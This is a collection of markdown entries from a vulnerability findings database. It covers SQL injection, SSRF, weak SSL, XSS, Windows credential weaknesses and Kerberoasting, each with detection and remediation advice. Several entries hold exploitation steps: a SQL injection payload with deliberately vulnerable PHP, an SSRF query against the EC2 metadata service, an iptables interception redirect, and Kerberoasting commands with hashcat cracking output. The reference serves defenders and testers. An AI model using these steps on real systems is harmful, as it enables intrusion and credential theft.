 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | SQL Injection occurs when a unsanitized field takes content from an untrusted source and passes it directly into an SQL query.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | SQL Injection allows an attacker to execute arbitrary SQL in the context of the web application.  Potentially gaining the ability to read, write, and modify database contents.
16 | 
17 | ## Detection
18 | 
19 | Detection can be accomplished by whitelisting known database lookups performed by the web application, and alerting if any commands other than the whitelisted ones are executed against the database in the context of the web application.
20 | 
21 | This can be accomplished by coding a method into whatever application is used to access the db, that performs these checks/alerts.  Mysql query history can also be [monitored directly.](https://stackoverflow.com/questions/21523811/mysql-commands-history)
22 | 
23 | Detection of SQLi can also be performed by network or host based IDS.
24 | 
25 | SQLi can also be detected by monitoring for unexpected changes to the database and its contents manually.  Or by monitoring the web application's logs (such as apache's access.log).  Or by monitoring network activity for signs of sensitive data being accessed by a remote party.
26 | 
27 | 
28 | ## Remediation
29 | 
30 | Correctly sanitize input into the database from any and all untrusted sources.
31 | 
32 | This resource provides instructions for proper sanitization in a number of languages: http://bobby-tables.com/
33 | Another resource can be found [here](https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet).
34 | 
35 | The main method by which one avoids SQLi is through the use of parametereized queries.  A parameterized query is a query for which specific inputs are mapped to specific parameters.  The exact way to implement is different in every language and for every library (SQL backend/server type).  However, here is a [wonderful resource, a multi-language cheat sheet from OWASP.](https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet)
36 | 
37 | The end goal is to remove/escape special characters from the user supplied input.  Or to properly encapsulate the user supplied input in quotes that it cannot escape.  These methods can accomplish that for you.
38 | 
39 | 
40 | ## References
41 | 
42 | https://www.owasp.org/index.php/SQL_Injection
43 | 
44 | ## Exploitation
45 | 
46 | An attacker can exploit this vulnerability by simply injecting arbitrary SQL into an unsanitized input field.  The attacker is usually required to properly guess the format of the query into which his input in injected.  He can then reverse engineer the format, causing his data to in effect "break out" of the query and create it's own.
47 | 
48 | For example.  If a query performs a lookup of username by first name in a users table it might look something like this: SELECT username FROM users WHERE firstname='user_supplied_firstname'.  In this scenario, the attacker would be able to "break out" of the quoted parameter by setting his input like so user_supplied_firstname = ' or 1=1;--
49 | 
50 | The final query would look like this: SELECT username FROM users WHERE firstname='' or 1=1;--
51 | 
52 | This would tell the SQL database to return all the usernames where the firstname is equal to '', or where 1=1.  1 is always equal to 1, therefore it always returns true.  This will cause the query therefore to return all of the usernames in the database.
53 | 
54 | It's a very basic example.  But it demonstrates exactly what SQLi is.  When special characters are allowed into a query unescaped, they can modify the query itself.
55 | 
56 | An example is demonstrated below.
57 | 
58 | ```php
59 | <?php
60 | if(isset($_GET['firstname'])) {
61 | 
62 |         $search = $_GET['firstname'];
63 |         $db = new SQLite3('users.db');
64 |         $results = $db->query("SELECT username FROM users WHERE firstname='$search'");
65 |         while($row = $results->fetchArray()){
66 |                 echo $row[0];
67 |                 echo "<br />";
68 |         }
69 | }
70 | ?>
71 | ```
72 | The above PHP code is vulnerable to SQLi.  It doesn't attempt to escape or remove special characters from the user supplied input before passing it into the query.
73 | 
74 | It also does not use parameterized queries to wrap the user supplied input inside of quotes, forcing them to stay inside a specific parameter.
75 | 
76 | **A regular query would look like this.**
77 | ![SQLi](../Assets/Web/SQLi_0.png)
78 | 
79 | **Returning the expected result.**
80 | ![SQLi](../Assets/Web/SQLi_1.png)
81 | 
82 | **However, an attacker can modify the command.**
83 | ![SQLi](../Assets/Web/SQLi_2.png)
84 | 
85 | **And get every single username in the database dumped.**
86 | ![SQLi](../Assets/Web/SQLi_3.png)
87 | 
88 | As you can see, it doesn't take much for an attacker to exploit SQLi when presented with a vulnerable application.  
89 | 


--------------------------------------------------------------------------------
/Web/Server-Side Request Forgery.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Server-Side Request Forgery (SSRF)
 3 | Description: Server-Side Request Forgery, SSRF, CWE-918, CWE-441, A1-Injection
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 12/7/2015
 7 | - LAST UPDATED BY: @sethsec
 8 | 
 9 | ## Summary
10 | 
11 | The application takes a URL from the user and retrieves the contents of the URL on behalf of the user.  However, the application does not sufficiently validate the requested destination. (Paraphrased from CWE-918) 
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - By exploiting SSRF, an attacker can make requests from the application server.
16 | - An attacker can interact with otherwise restricted IP addresses and services, either on the server itself (localhost), or on other IPs. This can give an external attacker visibility to an internal environment.  This includes using the vulnerable server to port scan other hosts (Cross Site Port Attacks (XSPA)). 
17 | - If the vulnerable server can communicate with backend API's or services that do not require authentication, the external attacker can fully interact with those services.  
18 | - If the vulnerable application is hosted in a cloud environment, such as Amazon EC2 and OpenStack, this may allow the attacker to gain access to metadata services, which can be used to gain access to sensitive information, sometimes including credentials or private keys.  
19 | 
20 | ## Detection
21 | 
22 | 1) Browse the target application using an intercepting proxy (Burp, Fiddler, ZAP, etc). Determine if the following conditions apply:
23 |   - The target application is accepting a URL from you.  Ex: www.thirdpartysite.com
24 |   - The target application is displaying part or all of the result back to you.
25 | 
26 | 2) If both conditions apply, look at your proxy logs.  If you do not see the request to the resource (www.thirdpartysite.com) in your proxy logs, but you see the content on the page, this indicates that the content returned to you has been requested by the server itself on your behalf. This behavior indicates the application is vulnerable to SSRF.    
27 | 
28 | An intentionally vulnerable demo application requesting a page on behalf of the user:
29 | ![](imgs/ssrf1.png)
30 | 
31 | Requesting a webpage that shows the User-Agent and IP address of the requester:
32 | ![](imgs/ssrf2.png)
33 | 
34 | ## Remediation
35 | 
36 | Rather than proxying requests on behalf of users, the application should have the user’s browser retrieve the desired information. If it is necessary to proxy the request, a whitelist should be used on the server side and the User-Agent information should be stripped or modified.        
37 | 
38 | ## References
39 | 
40 | - [OWASP Top 10 2013-A1-Injection](https://www.owasp.org/index.php/Top_10_2013-A1-Injection)
41 | - [CWE-918: Server-Side Request Forgery (SSRF)](http://cwe.mitre.org/data/definitions/918.html)
42 | - [CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')](http://cwe.mitre.org/data/definitions/441.html)
43 | - [EC2 Instance Metadata Service Documentation](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
44 | - [OpenStack Metadata Service Documentation](http://docs.openstack.org/admin-guide-cloud/content/section_metadata-service.html)
45 | - [Compromising an unreachable Solr server with CVE-2013-6397](http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html)
46 | - [Bringing a Machete to the Amazon](https://www.youtube.com/watch?v=JTOWxi17k-w)
47 | - [Prezi Got pwned - A tale of responsible disclosure](http://engineering.prezi.com/blog/2014/03/24/prezi-got-pwned-a-tale-of-responsible-disclosure/)
48 | 
49 | ## Exploitation
50 | 
51 | Once you have determined that the application is vulnerable to SSRF, the vulnerability can be exploited in many different ways.
52 | - Manually testing SSRF using a browser (GET Requests), or something like Burp Repeater (POST Requests)
53 |   - The level of risk you can demonstrate depends on how much you know about the environment.  
54 |   - Is the vulnerable application hosted on a service that uses a metadata service (ex: http://169.254.169.254)?
55 |     - If so, pull up the reference documents above and make some requests to valid metadata service endpoints for your respective service. 
56 |     - EC2: http://www.example.com/?url=169.254.169.254/latest/dynamic/instance-identity/document
57 | - To discover services, exploit SSRF to perform a XSPA.  One simple way to do this is to use Burp Intruder. 
58 |   - Send the initial Request to Burp Intruder
59 |   - For the URL, use http://host:port format, and make the port the position
60 |   - For the payload, enter the port numbers you want to test (only TCP works)
61 |   - Start the attack. 
62 |     - Pay attention to the response times for each requested port. You should be able to infer which ports are open and which ports are closed based on the response times. Quicker times are open ports, longer times are closed ports (they timed out before the client gave up). 
63 | - Can you target other services via SSRF that are not directly accessible to you?
64 |   - You could even run a tool like dirbuster or the http-enum NSE via SSRF. 
65 | 
66 | Exploiting SSRF to query the Amazon EC2 Metadata service:
67 | ![](imgs/ssrf3.png)
68 | 
69 | Exploiting SSRF to query Amazon EC2 instance user data:
70 | ![](imgs/ssrf4.png)
71 | 
72 | Exploiting SSRF with Burp Intruder and a word list to query a second internal host that is not directly accessible to the attacker.  Note how request 3 is a different size than all of the other requests. That is because for all of the other requests, a "page not found" message was sent:
73 | 
74 | ![](imgs/ssrf5.png)


--------------------------------------------------------------------------------
/Web/WeakSSL.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Weak SSL Configurations
 3 | Description: Availability of weak encryption (e.g. DES, RC4, NULL) and hash (e.g. MD4, MD2) algorithms can make SSL/TLS 
 4 | communications more suspectible to Decryption and Manipulation. In addition, vulnerabilities in old versions of SSL can
 5 | lead to information disclosure.
 6 | */
 7 | 
 8 | - LAST UPDATED DATE: 12/14/2015
 9 | - LAST UPDATED BY: Joey M. (l0stkn0wledge)
10 | 
11 | ## Summary
12 | 
13 | Many web servers still support out dated methods of securing connections with SSL/TLS.  These methods can make the 
14 | communications between the server and clients more suspectible to both traditional man-in-the-middle attacks and to more
15 | sophisticated attacks where the SSL Handshake is intercepted and modified to create weaker connections between the client
16 | and the server.
17 | 
18 | ## Capabilities and Risk
19 | 
20 | This can be used to lead to the exposure of encrypted communications, which are often used to transmit sensitive data,
21 | which includes (but is not limited to):
22 | 
23 | - Usernames/Passwords
24 | - Personally Identifiable Information
25 | - Personal Health Information
26 | - Financial Data
27 | 
28 | ## Detection
29 | 
30 | Readily available tools like 'sslscan' can be used to determine the versions of SSL/TLS and cipher suites supported by a 
31 | server. Servers can also be tested using 'openssl s_client', which has several configuration options for enabling different
32 | versions of SSL/TLS and cipher suites.  This can allow for testing a server's connection and determining the supported 
33 | cipher suites.
34 | 
35 | ## Remediation
36 | 
37 | The best remedy for this solution is to ensure that web servers relying upon SSL/TLS are using up-to-date cipher suites
38 | that offer appropriate levels of protection.  Modern cipher suites making use of algorithms like AES and SHA-256 are 
39 | examples of the algorithms to consider for use.  Servers should be configured to a minimum SSL/TLS version of TLS v.1.0
40 | 
41 | ## References
42 | 
43 | - TLS Wikipedia (https://en.wikipedia.org/wiki/Transport_Layer_Security)
44 | - Mozilla Wiki on Server Hardening (https://wiki.mozilla.org/Security/Server_Side_TLS)
45 | - OWASP TLS Cheat Sheet (https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet)
46 | - CVE-2014-3566 "POODLE" (https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566)
47 | 
48 | ## Exploitation
49 | 
50 | 1. An attacker can use methods like ARP Spoofing or rogue wireless access points to intercept network communications
51 | 2. Use iptables to re-direct to your proxy listening port:
52 |     iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>
53 | 3. Use proxy tool (e.g. mitmproxy) to intercept the connection and alter SSL Handshake so client only requests weaker
54 | versions of SSL and/or weaker ciphers (configuration will vary depending on the tool(s) used.
55 | 


--------------------------------------------------------------------------------
/Web/XSS_Reflective.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: XSS - Reflective
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | Cross-site scripting (XSS) is a vulnerability that enables attackers to inject client-side code into web applications. 
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Worst case RCE (see reference for Hipchat below)
16 | - 
17 | 
18 | ## Detection
19 | 
20 | How does one detect the exploitation of this vulnerability, or detect its presence.
21 | 
22 | ## Remediation
23 | 
24 | What are some of the ways to fix this vulnerability?
25 | 
26 | ## References
27 | 
28 | - XSS to RCE in Hipchat: http://maustin.net/2015/11/12/hipchat_rce.html
29 | - Link to CVE
30 | - Link to Metasploit module
31 | - Link to Nessus/NeXpose/Qualys write up
32 | 
33 | ## Exploitation
34 | 
35 | A write up on how this vulnerability can be exploited with demo code or screen shots
36 | 
37 | 


--------------------------------------------------------------------------------
/Web/XSS_Stored.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: XSS - Stored
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | Cross Site Scripting is 
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" becuase of how much context is needed
16 | for a vulnerability to have one which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this vulnerability to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it) 
22 | 
23 | ## Detection
24 | 
25 | How does one detect the exploitation of this vulnerability, or detect its presence.
26 | 
27 | ## Remediation
28 | 
29 | What are some of the ways to fix this vulnerability?
30 | 
31 | ## References
32 | 
33 | - Link to blog post
34 | - Link to CVE
35 | - Link to Metasploit module
36 | - Link to Nessus/NeXpose/Qualys write up
37 | 
38 | ## Exploitation
39 | 
40 | A write up on how this vulnerability can be exploited with demo code or screen shots
41 | 
42 | 


--------------------------------------------------------------------------------
/Web/XSTE.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Cross Site Trust Exploitation
 3 | Description: Injection of static content to trick users.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/1
 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | Cross site trust exploitation occurs when an attacker is able to inject data into a web page for the purpose of making the site appear to say something it otherwise would not.
12 | This results in the user's trust in the site being exploited.  No actual code execution is required.
13 | 
14 | ## Capabilities and Risk
15 | 
16 | XSTE may allow an attacker to trick users into performing actions that they otherwise would not.  If the user trusts that the content of the site cannot be set by anyone other than the site itself the user is highly likely to trust any content appearing on the site.  
17 | 
18 | The attacker might use for example, an error field in a form which allows injecion of arbitraty (non-code) content to make the error field appear to read that the user must contact the "site admin" @ "malicious@email.com".  
19 | 
20 | ## Detection
21 | 
22 | Detection may be accomplished by monitoring site content and potential injection points.  Your best hope is not detection, but rather remediation.
23 | 
24 | ## Remediation
25 | 
26 | You must not allow injection into any portion of your application where injected content would appear to be coming from the site itself.  The user must not be able to in any way edit error fields for example.  (This commonly occurs when a web developer creates one error page which takes the error message as a parameter.)
27 | 
28 | ## References
29 | 
30 | http://www.lanmaster53.com/2014/05/cross-site-trust-exploitation/
31 | 
32 | ## Exploitation
33 | 
34 | The exploitation of this vulnerability is specific to the application in question.  It commonly requires nothing more than the attacker writing content into a sanitized field which does not properly format its output to clarify the origin of the content.
35 | 
36 | Pleae see the attached blog post for more information.
37 | 


--------------------------------------------------------------------------------
/Web/imgs/ssrf1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf1.png


--------------------------------------------------------------------------------
/Web/imgs/ssrf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf2.png


--------------------------------------------------------------------------------
/Web/imgs/ssrf3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf3.png


--------------------------------------------------------------------------------
/Web/imgs/ssrf4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf4.png


--------------------------------------------------------------------------------
/Web/imgs/ssrf5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf5.png


--------------------------------------------------------------------------------
/Windows/Old_KRBTGT_Password.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Old KRBTGT Password
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | Commonly referred to as the "Golden Ticket", this vulnerability stems from the fact that the KRBTGT user account that Microsoft uses to "sign" tickets isn't forced to change and is often discounted due to the fact that it expires soon after the domain is created. If an attacker is able to gain access to the password hash of this account (usually by dumping the domain hashes), they will be able to create kerberos ticket to log in to any Windows domain service or share as any user they wish, even fake ones, with any group membership they wish.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Anyone with access to the KRBTGT user account's password hash can effectively authenticate as any user in the domain until the account's password has been changed twice.
16 | 
17 | ## Detection
18 | 
19 | - TODO add detection mechanisms, there are a few
20 | 
21 | ## Remediation
22 | 
23 | Set up a script to change the password of the KRBTGT account password once a day. This limits the possible abuse window to 48 hours (because of the requirement to change the password twice to be effective). With a 48 hour window, it is less likely that an abuse of the Golen Ticket will be beneficial to an attacker or insider who has gotten to the point where they can dump the KRBTGT's account password hash.
24 | 
25 | ## References
26 | 
27 | - Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account: https://adsecurity.org/?p=483
28 | 
29 | ## Exploitation
30 | 
31 | A write up on how this vulnerability can be exploited with demo code or screen shots
32 | 
33 | 


--------------------------------------------------------------------------------
/Windows/Powershell.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: PowerShell
 3 | Description: PowerShell is a power scripting environment that is built-in to all modern Windows systems. When not locked
 4 | down and properly configured this can give an attacker a great deal of access and the ability to perform functions which
 5 | otherwise might not be possible without having the ability to install other tools.
 6 | */
 7 | 
 8 | - LAST UPDATED DATE: 12/16/2015
 9 | - LAST UPDATED BY: Joey M. (@l0stkn0wledge)
10 | 
11 | ## Summary
12 | 
13 | PowerShell scripting provides a lot of power to IT Administrators, but it can also be a powerful tool for an attacker who
14 | gains access to a system running PowerShell.  The scripting can allow an attacker to perform many functions that may
15 | normally require them install other applications/tools to perform those functions. 
16 | 
17 | ## Capabilities and Risk
18 | 
19 | PowerShell can prove to be useful to attackers for a variety of reasons. There are examples where systems which had access
20 | to the cmd.exe blocked did not have the same access to powershell.exe blocked, allowing essentially the same level of 
21 | access as with the cmd.exe.  
22 | 
23 | Additionally, the vast scripting capabilities mean that many tools and exploits can potentially be run from a system on 
24 | which a standard user account may not have privilege to install tools.  These tools could be used to perform functions 
25 | to elevate privileges on the local system, perform network reconaissance, perform attacks against other remote systems, 
26 | etc.
27 | 
28 | ## Detection
29 | 
30 | Execution of powershell.exe on a Windows system is a sign of its availabilty. To check the execution policy, you can run:
31 | ```
32 | Get-ExecutionPolicy
33 | ```
34 | 
35 | ## Remediation
36 | 
37 | The best policy is to disable script execution within PowerShell.  The Set-ExecutionPolicy allows a Restricted option that
38 | will prevent the execution of scripts. While some security guides may recommend setting a policy that only allows signed
39 | scripts, this is a trivial barrier for an attacker to bypass. An attacker can bypass this by loading their own user-level
40 | certificate (and if necessary CA) and sign scripts that way.  These scripts would then still validate as signed.
41 | 
42 | ## References
43 | 
44 | - Wikipedia link on PowerShell (https://en.wikipedia.org/wiki/Windows_PowerShell)
45 | - Microsoft Technet on Scripting in PowerShell (https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx)
46 | - Powersploit post exploitation with PowerShell (https://github.com/PowerShellMafia/PowerSploit)
47 | 
48 | ## Exploitation
49 | 
50 | A write up on how this finding can be exploited with demo code or screen shots
51 | 


--------------------------------------------------------------------------------
/Windows/Shared_Admin.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Shared Local Windows Admin Password
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | Pass the Hash is 
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Lateral code execution and access to all systems with same local admin password
16 | 
17 | ## Detection
18 | 
19 | ?? Other than dumping hashes and trying it out yourself, I'm lost on this one
20 | 
21 | ## Remediation
22 | 
23 | - Disable the local Administrator (RID 500) account. Or simply do not enable the account as it has been disabled by default since Windows Vista 
24 | - Enable LocalAccountTokenFilterPolicy registry key as detailed in the references
25 | - Use Microsoft's LAPS or alternative local account randomization tool to randomize the local account passwords.
26 | 
27 | ## References
28 | 
29 | - Pass the Hash: https://en.wikipedia.org/wiki/Pass_the_hash
30 | - Microsoft LAPS: https://www.microsoft.com/en-us/download/details.aspx?id=46899
31 | 
32 | ## Exploitation
33 | 
34 | 
35 | ### Dumping hashes from exploited machine then using the hash to access other machines on the network
36 | 
37 | ```
38 | ```


--------------------------------------------------------------------------------
/Windows/WDigest.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: WDigest Enabled
 3 | Description: WDigest Clear-Text Password Storage Enabled
 4 | */ 
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | WDigest is an authentication funtion that is built into Windows. It is used to allow automatic authentication against web applications that require Digest authentcation (MD5). In order to provide the MD5 hash automatically, Windows stores the clear text version of that the user's password. Tools like Mimikatz and WCE provide a way to dump these passwords out of memory with the use of administrative access to a system. Mimikatz even has the ability to do this offline with a memory dump of a system's LSASS process.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Lateral code execution and access to all systems that require only password authentication. Due to the fact that Pass-the-Hash is non-trivial with RDP and usually requires specific settings to be set, a clear text credential is much more damaging to an organization.
16 | 
17 | ## Detection
18 | 
19 | - Host level by detecting Mimikatz or WCE usage
20 | - Network level by mass usage of credentials. Attackers need to find where the credentials dumped can be used and the usual way to do this is to test them out and see where access is granted
21 | 
22 | 
23 | ## Remediation
24 | 
25 | - Disable WDigest storage by applying the patch KB2871997 to all applicable systems
26 | 
27 | ## References
28 | 
29 | - Patch for Wdigest storage: http://blogs.technet.com/b/kfalde/archive/2014/11/01/kb2871997-and-wdigest-part-1.aspx
30 | 
31 | ## Exploitation
32 | 
33 | ### Using Mimikatz to dump clear text credentials
34 | 
35 | ```
36 | ```
37 | 


--------------------------------------------------------------------------------
/Windows/WPAD.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: WPAD Enabled
 3 | Description: WPAD proxy setting found enabled on a host
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | WPAD (Web Proxy Auto Discovery Protocol) affects any system that has "Auto Discovery Proxy Settings" turned on but it is on by default in Windows. This 
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Steal credentials while on the same network as the user affected
16 | - SMB or HTTP relay of credentials to NTLM based services
17 | - Code execution when used in conjuntion with PSEXEC
18 | 
19 | ## Detection
20 | 
21 | Wireshark looking for WPAD requests on the wire. 
22 | 
23 | ## Remediation
24 | 
25 | Windows has per-user and per-system proxy settings making this a very difficult setting to fix enterprise wide. 
26 | 
27 | Using the reference on [craig-tolley.co.uk](http://www.craig-tolley.co.uk/2011/08/30/disable-automatically-detect-settings-in-internet-explorer/) you can set a VB script to run as a Logon Script that will disable this setting.
28 | 
29 | ## References
30 | 
31 | 1. https://www.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
32 | 2. http://www.netresec.com/?page=Blog&month=2012-07&post=WPAD-Man-in-the-Middle
33 | 3. http://www.craig-tolley.co.uk/2011/08/30/disable-automatically-detect-settings-in-internet-explorer/
34 | 
35 | ## Exploitation
36 | 
37 | ### Scenario 1: Credential Stealing
38 | 
39 | ```
40 | Code and screen shots of this happening
41 | ```
42 | 
43 | ### Scenario 2: SMB Relay to PSEXEC for code execution
44 | 
45 | ```
46 | Code and screen shots of this happening
47 | ```
48 | 


--------------------------------------------------------------------------------
/Windows/Weak_SPN_Password.md:
--------------------------------------------------------------------------------
  1 | /*
  2 | Title: Weak SPN Password
  3 | Description: Crackable password attached to SPN
  4 | */
  5 | 
  6 | - LAST UPDATED DATE: 2016/05/25
  7 | - LAST UPDATED BY: @mubix
  8 | 
  9 | ## Summary
 10 | 
 11 | Service Principal Names (SPNs) are a Microsoft way of desinating and identifying where services are running in a domain. These SPNs are attached to accounts within active directory. Any Domain User has the ability to lookup these attributes and request access to the service they provide. The Active Directory Domain Controller will issue the user requesting access to the service a Kerberos ticket. This ticket includes in it the encrypted and hashed password for the user the service is running under. Microsoft does this to allow access in the process of that service.
 12 | 
 13 | Example SPN Kerberos Tickets:
 14 | 
 15 | ```
 16 | Id                   : uuid-7856e72a-2c40-4d94-a939-8c671b80e2bd-2
 17 | SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKe
 18 |                        y}
 19 | ValidFrom            : 5/19/2016 3:06:41 PM
 20 | ValidTo              : 5/20/2016 12:53:24 AM
 21 | ServicePrincipalName : http/win10.sittingduck.info
 22 | SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey
 23 | 
 24 | Id                   : uuid-7856e72a-2c40-4d94-a939-8c671b80e2bd-3
 25 | SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKe
 26 |                        y}
 27 | ValidFrom            : 5/19/2016 3:06:41 PM
 28 | ValidTo              : 5/20/2016 12:53:24 AM
 29 | ServicePrincipalName : MSSQLSvc/WIN2K8R2.sittingduck.info
 30 | SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey
 31 | ```
 32 | 
 33 | ## Capabilities and Risk
 34 | 
 35 | An attacker can use the SPN services to request tickets for all of the SPNs listed in the domain and attempt to crack the passwords for all of the users the services are running under. If the SPN services are running under a user context, and the attacker is able to brute force crack the password for that user, the attacker can then utilize that password in any way that user has permissions for.
 36 | 
 37 | - Acquire list of services running on a particular host
 38 | - Acquire Kerberos tickets with the context of the user running the service
 39 | - Compromise a domain based on the level of the user running the SPN service (Domain Admin accounts have been used to run Services in the past)
 40 | 
 41 | ## Detection
 42 | 
 43 | Because this is standard usage of Active Directory it blends into normal daily traffic. Windows Advanced Threat Analytics (ATA) has a module that includes detection of large numbers of SPN Kerberos ticket requests. The other useful detection mechanism is to detect any time a service account is used outside of the machine to which it is assigned.
 44 | 
 45 | ## Remediation
 46 | 
 47 | - Use Managed Service Accounts if possible. They are automatically restricted to a single machine (will not work for cluster services), and change their password on a regular basis much like computer accounts.
 48 | - Ensure that any service accounts have long, strong passwords (20 character+)
 49 | 
 50 | ## References
 51 | 
 52 | - [Service Principal Names](https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85%29.aspx)
 53 | - [Managed Service Accounts](https://technet.microsoft.com/en-us/library/dd560633(v=ws.10%29.aspx)
 54 | - [Cracking Kerberos TGS Tickets Using Kerberoast - Exploiting Kerberos to Compromise the Active Directory Domain - Sean Metcalf - ADSecurity.org](https://adsecurity.org/?p=2293)
 55 | 
 56 | ## Exploitation
 57 | 
 58 | Acquire list of SPNs and request them using Impacket's GetUserSPNs.py example script:
 59 | ```
 60 | root@wpad:~/impacket/examples# ./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin
 61 | Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies
 62 | 
 63 | Password:
 64 | ServicePrincipalName                Name        MemberOf                                          PasswordLastSet
 65 | ----------------------------------  ----------  ------------------------------------------------  -------------------
 66 | http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
 67 | MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01         
 68 | ```
 69 | 
 70 | Crack the service ticket password using oclHashcat:
 71 | ```
 72 | root@sf:~/oclHashcat# ./oclHashcat -m 13100 hash -w 3 -a 3 ?l?l?l?l?l?l?l 
 73 | oclHashcat v2.01 (g0891e39) starting...
 74 | 
 75 | Device #1: Hawaii, 2858/4025 MB allocatable, 1010Mhz, 44MCU
 76 | Device #2: AMD FX(tm)-8120 Eight-Core Processor, skipped
 77 | 
 78 | Hashes: 1 hashes; 1 unique digests, 1 unique salts
 79 | Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 80 | Applicable Optimizers:
 81 | * Zero-Byte
 82 | * Not-Iterated
 83 | * Single-Hash
 84 | * Single-Salt
 85 | * Brute-Force
 86 | Watchdog: Temperature abort trigger set to 90c
 87 | Watchdog: Temperature retain trigger set to 80c
 88 | 
 89 | Device #1: Kernel /root/git/oclHashcat/kernels/m13100_a3.919aa8b9.kernel (234320 bytes)
 90 | Device #1: Kernel /root/git/oclHashcat/kernels/markov_le.919aa8b9.kernel (36184 bytes)
 91 | 
 92 | Device #1: autotuned kernel-accel to 64
 93 | Device #1: autotuned kernel-loops to 50
 94 | 
 95 | [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
 96 | 
 97 | $krb5tgs$23$*user$realm$test/hashcat*$08e2261b7a89e56f530b2f7e0620fe8b$ecdca97c13814c95810d7706faf986dad98d06ba033fc5a45fbe9b417b855db5:hashcat
 98 | 
 99 | Session.Name...: oclHashcat
100 | Status.........: Cracked
101 | Input.Mode.....: Mask (?l?l?l?l?l?l?l) [7]
102 | Hash.Target....: $krb5tgs$23$*user$realm$test/hashcat*$08e...
103 | Hash.Type......: Kerberos 5 TGS-REP etype 23
104 | Time.Started...: Wed Feb 17 08:33:57 2016 (5 secs)
105 | Speed.Dev.#1...:   111.0 MH/s (80.83ms)
106 | Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
107 | Progress.......: 252313600/8031810176 (3.14%)
108 | Rejected.......: 0/252313600 (0.00%)
109 | Restore.Point..: 0/456976 (0.00%)
110 | HWMon.GPU.#1...:  0% Util, 42c Temp, 20% Fan
111 | 
112 | Started: Wed Feb 17 08:33:57 2016
113 | Stopped: Wed Feb 17 08:34:04 2016
114 | ```
115 | 


